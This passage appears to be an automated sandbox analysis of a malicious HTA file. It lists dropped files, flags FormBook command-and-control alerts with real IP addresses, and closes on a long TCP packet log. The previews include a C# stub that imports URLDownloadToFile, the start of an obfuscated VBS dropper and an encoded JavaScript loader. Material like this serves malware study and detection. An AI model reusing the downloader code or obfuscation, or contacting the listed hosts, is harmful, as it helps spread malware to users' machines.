                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg5uzgwi.ohh.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.0879939054127954
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryeak7YnqqMPN5Dlq5J:+RI+ycuZhNgakSMPNnqX
                                                                                                    MD5:2B4C1C4D88820F8250991A0AFF9B33A0
                                                                                                    SHA1:CB661BCDD83C64DD7C98C9386CB5942F00481929
                                                                                                    SHA-256:A2778B702AB3A3356C34CA498D07F0B57B6FEDE47FA859BB19085E6B8A6F8E13
                                                                                                    SHA-512:11965D4B653B2269FAE38E775CB6820063EF3A480E6FA1A53FBD9AADB798649E6E77075D275DDA4B27841B15523EC5AC98EA5807E923B2818215369FA3EE10F0
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.f.o.j.0.p.n.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                    C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.0.cs

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):468
                                                                                                    Entropy (8bit):3.8182722012596346
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zuQyKXhHM+nQXReKJ8SRHy4HRauMY2/+l3Iy:V/DTLDfu44XfH4r+lIy
                                                                                                    MD5:55A4ED356C8411F5813A7DFEFAEBC6BF
                                                                                                    SHA1:60F8E2E6C2490EDD6FC434083637557EBAFDB8D6
                                                                                                    SHA-256:8D5075329ADD0CA9BB0A08F016BAB8F6F3B42F60FF47C7D1AFEC25483CDC09F9
                                                                                                    SHA-512:39C42748425442B0A895B24E5E9F53E6A8E5FF0246EDBFEC374CD662117EC98ADCB989207579E8FA321BDD2AADFE3AF6945F020320B304C0DB89990B2955E35B
                                                                                                    Malicious:false
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace zFcqWk.{. public class PezMbFwBZf. {. [DllImport("URLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr grJpz,string NA,string mMy,uint VcOhyLcNIhU,IntPtr sINt);.. }..}.

                                                                                                    C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.243750890976725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fq/WKnSJ0zxs7+AEszICHhJ23fq/WD:p37Lvkmb6KiiWKndWZEviWKn+H
                                                                                                    MD5:C5D2776E02AB3129A6DA68E99A7C54C9
                                                                                                    SHA1:828941DF6DA2B424063B5A1E4F6A858D08F5267E
                                                                                                    SHA-256:07B0AC4DF749CF06C381FD8A239ECA0E8A0D5D1007E5BCEC065800D13DCE3314
                                                                                                    SHA-512:C69CE679DC34BF8FC84D7D64337CF323874F925D4FED26A9DEBB372C43EBB8DAA905377B0A2CAAF7FCCA4A537850E7B1E0C38CB24145C29728E7E0342F83BED3
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.0.cs"

                                                                                                    C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.818435771053734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:etGS1PBG5eM7p8amzkwlAU3t4RtkZfQK+qhkWI+ycuZhNgakSMPNnq:62sM+ayAU3t4cJQjEH1ulga3cq
                                                                                                    MD5:C64EF70D65438860D6FD251C0C47B7D6
                                                                                                    SHA1:B665D3D8BBF6C49FCE90ACAF1ABBD6F92D402286
                                                                                                    SHA-256:9FB61E468A4FDC4C5AC7E55C96CAD1299063EDE749EA754AA6B6179C2D11EC22
                                                                                                    SHA-512:4DC268D4D6FFD51E25BABEB4B083C733CDF5BC2F2DA9B1636A56D26CADB37B518F28200405BB856A69677329C6710A0DECE27901846175965A17DC728A486ABE
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!WPg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!.....*.......@.......................................)..........<Module>.hf

                                                                                                    C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.out

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):870
                                                                                                    Entropy (8bit):5.3062722772270705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KOqd3ka6KiiWUyEviWU+OKax5DqBVKVrdFAMBJTH:xika6LiWUyEviWU+OK2DcVKdBJj
                                                                                                    MD5:DC86D0279A3C79B553E09E92C764D988
                                                                                                    SHA1:B035039824B34E2077520125E82E44D11F634583
                                                                                                    SHA-256:6EA64D0563752977CEBA756FD37E7734A99689A861DAF2D4F7D5262861AA87E0
                                                                                                    SHA-512:0AB743542073E31F19CC8205AD65608418921671F657471A86DC2D070BC6A25CF2B1DF22C45963FD0D515187911273FD37AB17DDC1B40A3C4BCEE8CB95270E75
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                    C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS

                                                                                                    Download File
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (3266), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):154108
                                                                                                    Entropy (8bit):3.80902206387575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Y53KPX3LVRMFTHvqq53KPX3LVRMF153KPX3LVRMF6:lPLVGFqPLVGFWPLVGF6
                                                                                                    MD5:714404045E7841CEBE0302E177C6CD3D
                                                                                                    SHA1:22EFC9796C48BA9527219AB6118E71D1CD9DA729
                                                                                                    SHA-256:EF6B11FE955BC7F2064CAD480851792FC6E9625325B32480252300BE1FEBA8DE
                                                                                                    SHA-512:D30E94AEFD53EAECB533AFC02E104370B93FBFD8767ECE8B663AF7F48E312EC37AB4C99243CC3A1995D4B2C5B08DA780DE0EA85BB041EA85F9C33B6039C97133
                                                                                                    Malicious:true
                                                                                                    Preview:...... . . . .....L.L.k.b.p.i.l.u.b.L.v.f.A.b.K. .=. .".K.c.a.i.s.I.I.o.A.P.L.d.B.K.i.".....N.G.Z.K.J.L.K.W.K.q.N.t.i.U.G. .=. .".L.Z.A.z.R.b.A.Z.x.c.K.f.b.i.Z.".....b.g.A.A.P.i.W.K.h.I.f.G.L.P.G. .=. .".t.p.m.r.i.o.c.k.W.C.d.i.l.U.I.".........W.n.q.k.f.L.B.L.i.A.s.o.S.z.W. .=. .".N.o.O.N.P.q.K.L.O.G.d.h.W.c.n.".....k.m.p.L.R.i.m.s.r.m.K.k.P.p.Z. .=. .".Q.W.u.Z.m.c.Z.i.q.K.B.x.c.s.k.".....o.T.i.c.b.L.L.B.N.i.i.U.i.A.N. .=. .".f.i.e.l.p.d.k.z.a.j.j.i.l.i.W.".....L.W.G.R.N.p.W.L.c.Z.f.G.K.J.h. .=. .".L.G.f.T.K.C.Z.v.N.L.A.e.b.L.b.".....r.L.C.L.q.d.G.g.L.K.u.W.K.n.o. .=. .".s.H.K.i.C.c.W.U.c.C.A.k.W.O.m.".....m.p.f.d.c.J.f.U.j.I.g.U.W.e.o. .=. .".i.p.o.c.U.p.S.k.e.i.t.l.c.W.k.".....r.K.d.u.G.S.q.p.H.K.L.O.Z.l.U. .=. .".I.L.G.b.o.h.G.K.Z.W.L.p.f.O.i.".....G.g.h.m.H.u.a.m.H.k.a.C.G.p.d. .=. .".m.p.U.h.z.i.i.i.Z.R.W.W.p.c.P.".....N.B.Z.Z.K.z.m.P.i.L.k.L.d.G.L. .=. .".f.a.o.R.i.i.Z.N.W.W.h.d.G.Q.C.".....C.j.v.Z.L.L.K.n.f.P.f.t.o.G.b. .=. .".L.N.O.P.A.f.h.W.p.m.n.g.K.h.h.".....O.Z.h.f.S.f.e.x.

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Entropy (8bit):2.480213116370656
                                                                                                    TrID:
                                                                                                      File name:bestimylover.hta
                                                                                                      File size:160'031 bytes
                                                                                                      MD5:a61aacd5049328c9b8e3460d53e943ad
                                                                                                      SHA1:ea66f697d5e07baf7dd6a4ab9d500688316b73fd
                                                                                                      SHA256:c9d68c4787494badf47161637edf290f9297f8d66bb64fbc307fc7a978980509
                                                                                                      SHA512:f940e05535a0f788b30758e2575646dab998b94581bf18fac2ef72f5ce7226e743f611fea21e6228de9a9186b241235524d09118db43e9d79494ecb107f63a68
                                                                                                      SSDEEP:96:4owZw9d6yfaZacMAfl6MLTIOxOHozDmacMAfl6MLTjLzOxOHozDFyn5Mh+4uCc05:4Lw4+4zc0pvP85Q
                                                                                                      TLSH:13F3E041A9240065FBFD5EA6ADEDB74E35A4221E9ECD9D4D4327FB80DCB324BA4409CC
                                                                                                      File Content Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-04T13:08:11.192706+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1107.172.44.17580192.168.2.849709TCP
                                                                                                      2024-12-04T13:08:11.192706+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1107.172.44.17580192.168.2.849709TCP
                                                                                                      2024-12-04T13:08:31.061460+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.129.137443192.168.2.849705TCP
                                                                                                      2024-12-04T13:09:38.120623+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849723172.67.150.21180TCP
                                                                                                      2024-12-04T13:09:54.892305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849764172.67.128.10980TCP
                                                                                                      2024-12-04T13:09:57.553460+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849771172.67.128.10980TCP
                                                                                                      2024-12-04T13:10:00.253464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849777172.67.128.10980TCP
                                                                                                      2024-12-04T13:10:02.988867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849783172.67.128.10980TCP
                                                                                                      2024-12-04T13:10:10.198968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849800199.59.243.22780TCP
                                                                                                      2024-12-04T13:10:12.872968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849810199.59.243.22780TCP
                                                                                                      2024-12-04T13:10:15.529013+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849816199.59.243.22780TCP
                                                                                                      2024-12-04T13:10:18.203664+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.849822199.59.243.22780TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 4, 2024 13:08:18.918879032 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:19.039737940 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:19.039853096 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:19.040237904 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:19.160159111 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.148108006 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.148210049 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.148358107 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.148371935 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.148401976 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.148421049 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.148988008 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.149004936 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.149029970 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.149045944 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.150113106 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.150132895 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.150166988 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.150183916 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.151226997 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.151247025 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.151271105 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.151290894 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.152266979 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.152319908 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.268043041 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.268129110 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.268249989 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.268297911 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.273091078 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.273180008 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.340455055 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.340518951 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.340621948 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.340660095 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.344587088 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.344640017 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.346167088 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.346237898 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.346411943 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.346453905 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.354566097 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.354610920 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.354839087 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.354885101 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.363069057 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.363140106 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.363320112 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.363369942 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.371609926 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.371665955 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.371834993 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.371881008 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.380055904 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.380152941 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.380275011 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.380320072 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.388571024 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.388613939 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.389065981 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.389107943 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.396948099 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.396994114 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.397233963 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.397277117 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.405464888 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.405510902 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.405692101 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.405736923 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.413034916 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.413080931 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.413579941 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.413628101 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.420726061 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.420773983 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.532556057 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.532613993 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.532798052 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.532850981 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.534900904 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.534949064 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.535149097 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.535208941 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.539870024 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.539921999 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.541810036 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.541861057 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.542057991 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.542109966 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.546858072 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.546907902 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.547076941 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.547122002 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.551006079 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.551054955 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.551249981 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.551306009 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.555634022 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.555681944 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.555898905 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.555951118 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.560345888 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.560399055 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.560600996 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.560646057 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.565201044 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.565247059 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.565452099 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.565495014 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.569731951 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.569776058 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.570003986 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.570050001 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.574438095 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.574484110 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.574672937 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.574716091 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.579183102 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.579226017 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.579385042 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.579431057 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.583830118 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.583872080 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.584081888 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.584125996 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.588998079 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.589042902 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.589327097 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.589519024 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.593405962 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.593446016 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.593580961 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.593631029 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.598053932 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.598097086 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.598314047 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.598357916 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.603615046 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.603713036 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.604207993 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.604250908 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.608022928 CET8049704107.172.44.175192.168.2.8
                                                                                                      Dec 4, 2024 13:08:20.608071089 CET4970480192.168.2.8107.172.44.175
                                                                                                      Dec 4, 2024 13:08:20.724647045 CET8049704107.172.44.175192.168.2.8
